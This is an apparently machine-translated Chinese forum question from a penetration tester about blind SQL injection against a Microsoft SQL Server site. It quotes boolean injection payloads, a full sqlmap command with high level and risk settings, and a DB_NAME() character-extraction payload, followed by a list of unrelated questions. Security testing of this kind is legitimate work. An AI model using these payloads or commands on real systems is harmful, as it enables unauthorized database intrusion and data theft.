Microsoft SQL Server 2017 中的 SQL 注入问题检索数据库名称
问题描述 投票:0回答:0
在进行渗透测试时,我在一个使用 IIS Web 服务器的网站中遇到了 SQL 盲注。我试过这个有效载荷
" AND 11=11 AND ('Hlua'='Hlua"
它有效并返回成功页面。然后我试了
" AND 11=12 AND ('Hlua'='Hlua"
并返回错误页面。之后我打开 sqlmap 并传递了这个命令
sqlmap -u "https://example.com/popup.aspx?vote=4444" -p "vote" --random-agent --level=5 --risk=3 --dbms="Microsoft SQL Server" --threads=10 --no-cast --current-db -v3
它确认了该漏洞,但是当我尝试检索当前数据库或用户或横幅时,它什么也不返回,当我尝试 --is-dba 它返回 false 这是我使用的有效负载,但它
"') AND UNICODE(SUBSTRING((SELECT DB_NAME()),1,1))>32 AND ('dPwr'='dPwr"即使在sqlmap中也没有防火墙的迹象
我尝试使用
--common-tables/--common-columns有什么帮助吗?
最新问题
- 如何在 lmer 混合模型中获得每个随机效应水平的 95% CI
- OpenRewrite - 重写 OpenRewrite 7 配方到 OpenRewrite 8 配方
- 读取旧的 APL *.sf 文件
- Python Solana 机器人交易问题
- 在Python中的netgraph模块的多图函数中设置种子
- 从该工作表中的应用程序脚本操作与谷歌工作表关联的谷歌表单
- Laravel 从 API 响应中删除标头值
- 有没有办法在一个vpc中拥有应用程序负载均衡器并在另一个vpc中拥有集群。现在使用 vpc 对等与他们通信
- GCP 编辑磁盘已禁用,仅显示“正在加载...”
- 如何匹配两个内容相同但标题不同的视频?
- 在 Twilio 中发送音频消息
- Redshift - 字符串列被截断
- 是否可以在同一个服务器中创建2个或更多BayeuxServer实例
- 列表映射:当映射以日期时间属性为条件时,对于成员配置,目标对象日期时间属性始终具有默认值
- 使用vue-i18n链接消息时如何使用特殊字符?
- 导入错误:DLL 加载失败:动态链接库 (DLL) 初始化例程失败
- 调用 webhook“vingress.elbv2.k8s.aws”失败
- Serilog:无法显示.LogTrace?
- Power BI KPI 视觉效果
- 多个饼图
© www.soinside.com 2019 - 2024. All rights reserved.